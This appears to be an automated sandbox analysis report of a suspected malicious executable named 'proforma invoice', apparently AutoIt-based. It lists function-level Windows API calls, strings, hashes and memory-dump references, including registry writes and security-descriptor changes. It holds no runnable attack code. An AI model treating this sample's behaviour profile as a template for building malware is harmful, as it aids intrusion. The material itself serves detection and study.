                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D80
                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D89
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22D98
                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DA1
                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DA8
                  • GlobalFree.KERNEL32(00000000), ref: 00B22DB3
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22DC5
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3FC38,00000000), ref: 00B22DDB
                  • GlobalFree.KERNEL32(00000000), ref: 00B22DEB
                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B22E11
                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B22E30
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B22E52
                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B2303F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                  • String ID: $AutoIt v3$DISPLAY$static
                  • API String ID: 2211948467-2373415609
                  • Opcode ID: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
                  • Instruction ID: 0ae80172484f0ad3ed209ef34e0fb624a59c13c2f068804a543efac464793644
                  • Opcode Fuzzy Hash: 7d9d11aa1b4b6dac6341fa3162d52ce41b77b4e758b53b31924574a6d04eb653
                  • Instruction Fuzzy Hash: 9D028B71900215EFDB14DFA8DD89EAE7BB9EF49310F148558F919AB2A1CB34ED00CB60
                  Function 00B370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                  Download Yara Rule
                  APIs
                  • SetTextColor.GDI32(?,00000000), ref: 00B3712F
                  • GetSysColorBrush.USER32(0000000F), ref: 00B37160
                  • GetSysColor.USER32(0000000F), ref: 00B3716C
                  • SetBkColor.GDI32(?,000000FF), ref: 00B37186
                  • SelectObject.GDI32(?,?), ref: 00B37195
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B371C0
                  • GetSysColor.USER32(00000010), ref: 00B371C8
                  • CreateSolidBrush.GDI32(00000000), ref: 00B371CF
                  • FrameRect.USER32(?,?,00000000), ref: 00B371DE
                  • DeleteObject.GDI32(00000000), ref: 00B371E5
                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B37230
                  • FillRect.USER32(?,?,?), ref: 00B37262
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B37284
                    • Part of subcall function 00B373E8: GetSysColor.USER32(00000012), ref: 00B37421
                    • Part of subcall function 00B373E8: SetTextColor.GDI32(?,?), ref: 00B37425
                    • Part of subcall function 00B373E8: GetSysColorBrush.USER32(0000000F), ref: 00B3743B
                    • Part of subcall function 00B373E8: GetSysColor.USER32(0000000F), ref: 00B37446
                    • Part of subcall function 00B373E8: GetSysColor.USER32(00000011), ref: 00B37463
                    • Part of subcall function 00B373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
                    • Part of subcall function 00B373E8: SelectObject.GDI32(?,00000000), ref: 00B37482
                    • Part of subcall function 00B373E8: SetBkColor.GDI32(?,00000000), ref: 00B3748B
                    • Part of subcall function 00B373E8: SelectObject.GDI32(?,?), ref: 00B37498
                    • Part of subcall function 00B373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
                    • Part of subcall function 00B373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
                    • Part of subcall function 00B373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                  • String ID:
                  • API String ID: 4124339563-0
                  • Opcode ID: 44a4dd4c0680b649d602e26056f58b315c98643a5a7147fd6f5b5b99dc75f5e7
                  • Instruction ID: 923482a1147b561f03bb75052d2fc595c9dcf2202cdb4f22c2aecb084f486acc
                  • Opcode Fuzzy Hash: 44a4dd4c0680b649d602e26056f58b315c98643a5a7147fd6f5b5b99dc75f5e7
                  • Instruction Fuzzy Hash: F1A19F72008701AFDB109FA4DC49E6FBBE9FB49321F200A19F962A71E1DB71E944DB51
                  Function 00AB8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 00AB8E14
                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00AF6AC5
                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AF6AFE
                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AF6F43
                    • Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5
                  • SendMessageW.USER32(?,00001053), ref: 00AF6F7F
                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AF6F96
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FAC
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AF6FB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                  • String ID: 0
                  • API String ID: 2760611726-4108050209
                  • Opcode ID: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
                  • Instruction ID: 3db7a3611a2818cc1b0039826f74919013555ab0231e98a53c9140aab5e879e9
                  • Opcode Fuzzy Hash: e7a4176402a4094714cf3aa47c97cdd910ced729ca2fc6d6805b40b92182b678
                  • Instruction Fuzzy Hash: 40129E31200205EFD725DF68C944BB9BBF9FB44300F148469F6999B262CB35EC92DB91
                  Function 00B22711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(00000000), ref: 00B2273E
                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B2286A
                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B228A9
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B228B9
                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B22900
                  • GetClientRect.USER32(00000000,?), ref: 00B2290C
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B22955
                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B22964
                  • GetStockObject.GDI32(00000011), ref: 00B22974
                  • SelectObject.GDI32(00000000,00000000), ref: 00B22978
                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B22988
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B22991
                  • DeleteDC.GDI32(00000000), ref: 00B2299A
                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B229C6
                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B229DD
                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B22A1D
                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B22A31
                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B22A42
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B22A77
                  • GetStockObject.GDI32(00000011), ref: 00B22A82
                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B22A8D
                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B22A97
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                  • API String ID: 2910397461-517079104
                  • Opcode ID: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
                  • Instruction ID: 2da448dcdabc46b93cb06d07a6c08f88f151445bb0d052f39d928260d156357e
                  • Opcode Fuzzy Hash: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
                  • Instruction Fuzzy Hash: 0AB17E71A00215BFEB14DFA8DC86EAE7BB9EB08710F104554F919EB2A1DB70ED40CB64
                  Function 00B14ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B14AED
                  • GetDriveTypeW.KERNEL32(?,00B3CB68,?,\\.\,00B3CC08), ref: 00B14BCA
                  • SetErrorMode.KERNEL32(00000000,00B3CB68,?,\\.\,00B3CC08), ref: 00B14D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$DriveType
                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                  • API String ID: 2907320926-4222207086
                  • Opcode ID: c9318b9f683b79abb84aded647d7f13eff12888dd489601c41cb99a9298b0b99
                  • Instruction ID: aa5e35480434087a806baf32da070a510cc5be5324fdf25e885a76947ab3c825
                  • Opcode Fuzzy Hash: c9318b9f683b79abb84aded647d7f13eff12888dd489601c41cb99a9298b0b99
                  • Instruction Fuzzy Hash: 8461B030605106EBCB04DF24CAC1DEDB7E0EB46740BA484E5F806AB2A1DB39ED81DB81
                  Function 00B373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetSysColor.USER32(00000012), ref: 00B37421
                  • SetTextColor.GDI32(?,?), ref: 00B37425
                  • GetSysColorBrush.USER32(0000000F), ref: 00B3743B
                  • GetSysColor.USER32(0000000F), ref: 00B37446
                  • CreateSolidBrush.GDI32(?), ref: 00B3744B
                  • GetSysColor.USER32(00000011), ref: 00B37463
                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
                  • SelectObject.GDI32(?,00000000), ref: 00B37482
                  • SetBkColor.GDI32(?,00000000), ref: 00B3748B
                  • SelectObject.GDI32(?,?), ref: 00B37498
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B3752A
                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B37554
                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00B37572
                  • DrawFocusRect.USER32(?,?), ref: 00B3757D
                  • GetSysColor.USER32(00000011), ref: 00B3758E
                  • SetTextColor.GDI32(?,00000000), ref: 00B37596
                  • DrawTextW.USER32(?,00B370F5,000000FF,?,00000000), ref: 00B375A8
                  • SelectObject.GDI32(?,?), ref: 00B375BF
                  • DeleteObject.GDI32(?), ref: 00B375CA
                  • SelectObject.GDI32(?,?), ref: 00B375D0
                  • DeleteObject.GDI32(?), ref: 00B375D5
                  • SetTextColor.GDI32(?,?), ref: 00B375DB
                  • SetBkColor.GDI32(?,?), ref: 00B375E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                  • String ID:
                  • API String ID: 1996641542-0
                  • Opcode ID: 938adfcc7a08023f4eb774986a1a85dfd5279560727c96855434ea4a120bd86d
                  • Instruction ID: aa7383f9480a977e2757e91727bb9c47e23097a32de8f9fbfed9978cac7c4882
                  • Opcode Fuzzy Hash: 938adfcc7a08023f4eb774986a1a85dfd5279560727c96855434ea4a120bd86d
                  • Instruction Fuzzy Hash: 80616A72900218AFDF119FA4DC49EEEBFB9EB08320F214155F915BB2A1DB75A940DB90
                  Function 00B30FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetCursorPos.USER32(?), ref: 00B31128
                  • GetDesktopWindow.USER32 ref: 00B3113D
                  • GetWindowRect.USER32(00000000), ref: 00B31144
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B31199
                  • DestroyWindow.USER32(?), ref: 00B311B9
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B311ED
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B3120B
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B3121D
                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00B31232
                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B31245
                  • IsWindowVisible.USER32(00000000), ref: 00B312A1
                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B312BC
                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B312D0
                  • GetWindowRect.USER32(00000000,?), ref: 00B312E8
                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00B3130E
                  • GetMonitorInfoW.USER32(00000000,?), ref: 00B31328
                  • CopyRect.USER32(?,?), ref: 00B3133F
                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 00B313AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                  • String ID: ($0$tooltips_class32
                  • API String ID: 698492251-4156429822
                  • Opcode ID: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
                  • Instruction ID: f1491cb685e7be85f2bef20a734a28651aa3c35138805a40feca7f3089243570
                  • Opcode Fuzzy Hash: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
                  • Instruction Fuzzy Hash: EBB17C71604341AFD704DF68C985B6FBBE8FF85350F108958F999AB2A1CB31E844CBA1
                  Function 00AB8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB8968
                  • GetSystemMetrics.USER32(00000007), ref: 00AB8970
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB899B
                  • GetSystemMetrics.USER32(00000008), ref: 00AB89A3
                  • GetSystemMetrics.USER32(00000004), ref: 00AB89C8
                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AB89E5
                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AB89F5
                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AB8A28
                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AB8A3C
                  • GetClientRect.USER32(00000000,000000FF), ref: 00AB8A5A
                  • GetStockObject.GDI32(00000011), ref: 00AB8A76
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB8A81
                    • Part of subcall function 00AB912D: GetCursorPos.USER32(?), ref: 00AB9141
                    • Part of subcall function 00AB912D: ScreenToClient.USER32(00000000,?), ref: 00AB915E
                    • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000001), ref: 00AB9183
                    • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                  • SetTimer.USER32(00000000,00000000,00000028,00AB90FC), ref: 00AB8AA8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                  • String ID: AutoIt v3 GUI
                  • API String ID: 1458621304-248962490
                  • Opcode ID: b1cd0c0797910ff938be22df13e6203af2facc8d1e48beb2ac0d9233ecb9fccd
                  • Instruction ID: 7c2d173481e8de47f4fc9db8ef6e4b8cf86487ee16beed05953a8721c30ee8ab
                  • Opcode Fuzzy Hash: b1cd0c0797910ff938be22df13e6203af2facc8d1e48beb2ac0d9233ecb9fccd
                  • Instruction Fuzzy Hash: D3B16B71A00209AFDF14DFACCD46BEE7BB9FB48314F114229FA15A7291DB34A841CB61
                  Function 00B00D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                    • Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                    • Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                    • Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00DF5
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00E29
                  • GetLengthSid.ADVAPI32(?), ref: 00B00E40
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B00E7A
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00E96
                  • GetLengthSid.ADVAPI32(?), ref: 00B00EAD
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00EB5
                  • HeapAlloc.KERNEL32(00000000), ref: 00B00EBC
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00EDD
                  • CopySid.ADVAPI32(00000000), ref: 00B00EE4
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00F13
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00F35
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00F47
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F6E
                  • HeapFree.KERNEL32(00000000), ref: 00B00F75
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F7E
                  • HeapFree.KERNEL32(00000000), ref: 00B00F85
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F8E
                  • HeapFree.KERNEL32(00000000), ref: 00B00F95
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B00FA1
                  • HeapFree.KERNEL32(00000000), ref: 00B00FA8
                    • Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
                    • Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
                    • Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
                  • Instruction ID: 3b82d2801aca08d53d167a615eec04e00b986dcc13c59de380610a65774f45a2
                  • Opcode Fuzzy Hash: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
                  • Instruction Fuzzy Hash: E6715B7290020AEBDB20AFA4DC48FAEBFB8FF05301F244195FA59B7191DB719905DB60
                  Function 00B2C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2C4BD
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B3CC08,00000000,?,00000000,?,?), ref: 00B2C544
                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B2C5A4
                  • _wcslen.LIBCMT ref: 00B2C5F4
                  • _wcslen.LIBCMT ref: 00B2C66F
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B2C6B2
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B2C7C1
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B2C84D
                  • RegCloseKey.ADVAPI32(?), ref: 00B2C881
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2C88E
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B2C960
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
